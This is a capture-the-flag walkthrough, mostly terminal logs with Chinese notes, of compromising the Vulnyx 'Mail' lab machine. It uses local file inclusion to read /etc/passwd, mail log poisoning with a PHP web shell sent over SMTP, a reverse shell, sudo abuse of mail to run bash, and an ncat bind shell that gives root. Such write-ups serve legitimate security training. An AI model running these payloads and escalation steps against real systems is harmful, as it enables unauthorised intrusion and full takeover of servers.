Vulnyx-Mail-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.224  08:00:27:1e:d6:8d       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e1:d8:58       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.062 seconds (124.15 hosts/sec). 4 responded
❯ export ip=192.168.60.224
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.224:22
Open 192.168.60.224:25
Open 192.168.60.224:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-04 08:40 CST
Initiating ARP Ping Scan at 08:40
Scanning 192.168.60.224 [1 port]
Completed ARP Ping Scan at 08:40, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:40
Completed Parallel DNS resolution of 1 host. at 08:40, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:40
Scanning 192.168.60.224 [3 ports]
Discovered open port 22/tcp on 192.168.60.224
Discovered open port 25/tcp on 192.168.60.224
Discovered open port 80/tcp on 192.168.60.224
Completed SYN Stealth Scan at 08:40, 0.05s elapsed (3 total ports)
Nmap scan report for 192.168.60.224
Host is up, received arp-response (0.00052s latency).
Scanned at 2025-03-04 08:40:29 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
25/tcp open  smtp    syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:1E:D6:8D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

扫一下目录

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.224
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 271]
/1                    (Status: 200) [Size: 335]
/2                    (Status: 200) [Size: 365]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

LFI漏洞

在index.html中有个表单

会跳转到emailreader.php?id=后面的id参数猜测可以实现文件包含

LFI漏洞测试一下

得到两个用户cain abel

❯ curl http://192.168.60.224/emailreader.php\?id\=file:///etc/passwd |grep /bin/bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--  100  1554  100  1554    0     0   500k      0 --:--:-- --:--:-- --:--:--  505k
root:x:0:0:root:/root:/bin/bash
cain:x:1000:1000:cain,,,:/home/cain:/bin/bash
abel:x:1001:1001::/home/abel:/bin/bash

或者通过邮件对话也能得到这两个用户名

先利用这两个用户名跑一遍rockyou吧

再收集其他信息

log注入

发现可以利用邮件注入，我感觉算是日志注入的一种的吧

利用telnet发送邮件给cain用户

在DATA中写入一句话木马

❯ telnet $ip 25
Trying 192.168.60.224...
Connected to 192.168.60.224.
Escape character is '^]'.
220 mail.home ESMTP Postfix (Debian/GNU)
MAIL FROM:<[email protected]>
250 2.1.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
hahahaha
.
250 2.0.0 Ok: queued as AE2C55AC
quit
221 2.0.0 Bye
Connection closed by foreign host.

LFI读取一下cain的邮件

❯ curl http://192.168.60.224/emailreader.php\?id\=/var/mail/cain
<pre>
From [email protected]  Tue Mar  4 02:03:42 2025
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from unknown (unknown [192.168.60.100])
        by mail.home (Postfix) with SMTP id AE2C55AC
        for <[email protected]>; Tue,  4 Mar 2025 02:03:09 +0100 (CET)

hahahaha

</pre>

尝试执行命令，可以成功执行

❯ curl http://192.168.60.224/emailreader.php\?id\=/var/mail/cain\&cmd\=id
<pre>
From [email protected]  Tue Mar  4 02:03:42 2025
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: from unknown (unknown [192.168.60.100])
        by mail.home (Postfix) with SMTP id AE2C55AC
        for <[email protected]>; Tue,  4 Mar 2025 02:03:09 +0100 (CET)

uid=1000(cain) gid=1000(cain) groups=1000(cain)
hahahaha

</pre>

用户提权

反弹一下shell

存在sudo权限，执行mail

❯ pwncat-cs -lp 4444
[09:13:30] Welcome to pwncat 🐈!                            __main__.py:164
[09:13:40] received connection from 192.168.60.224:39822         bind.py:84
[09:13:40] 192.168.60.224:39822: registered new host w/ db   manager.py:957
(local) pwncat$
(remote) cain@mail:/var/www/html$
(remote) cain@mail:/home/cain$ sudo -l
Matching Defaults entries for cain on mail:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cain may run the following commands on mail:
    (abel) NOPASSWD: /usr/bin/mail
(remote) cain@mail:/home/cain$ sudo -u abel /usr/bin/mail --exec='!/bin/bash'
abel@mail:/home/cain$ cd ~
abel@mail:~$ cat user.txt
170e07ec2a52b4c0583dadd5e04a2998

Root提权

提权至abel后，再次信息收集

拥有sudo权限可以执行ncat

不过只能以IPV6形式来反弹

abel@mail:~$ sudo -l
Matching Defaults entries for abel on mail:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User abel may run the following commands on mail:
    (root) NOPASSWD: /usr/bin/ncat -6 *

我VM NAT网卡开一下IPV6功能，有IPv6了

尝试弹一下

abel@mail:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:1e:d6:8d brd ff:ff:ff:ff:ff:ff
    inet 192.168.60.224/24 brd 192.168.60.255 scope global dynamic enp0s3
       valid_lft 1745sec preferred_lft 1745sec
    inet6 fd15:4ba5:5a2b:1008:a00:27ff:fe1e:d68d/64 scope global dynamic mngtmpaddr
       valid_lft 86380sec preferred_lft 14380sec
    inet6 fe80::a00:27ff:fe1e:d68d/64 scope link
       valid_lft forever preferred_lft forever
abel@mail:~$ sudo  /usr/bin/ncat -6 -l -p 1234 -e /bin/bash
-----------------------------------
❯ ncat -6 fe80::a00:27ff:fe1e:d68d%eth0 1234
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
9f0541ef5fd69bfc3b2d4507eaf2a9db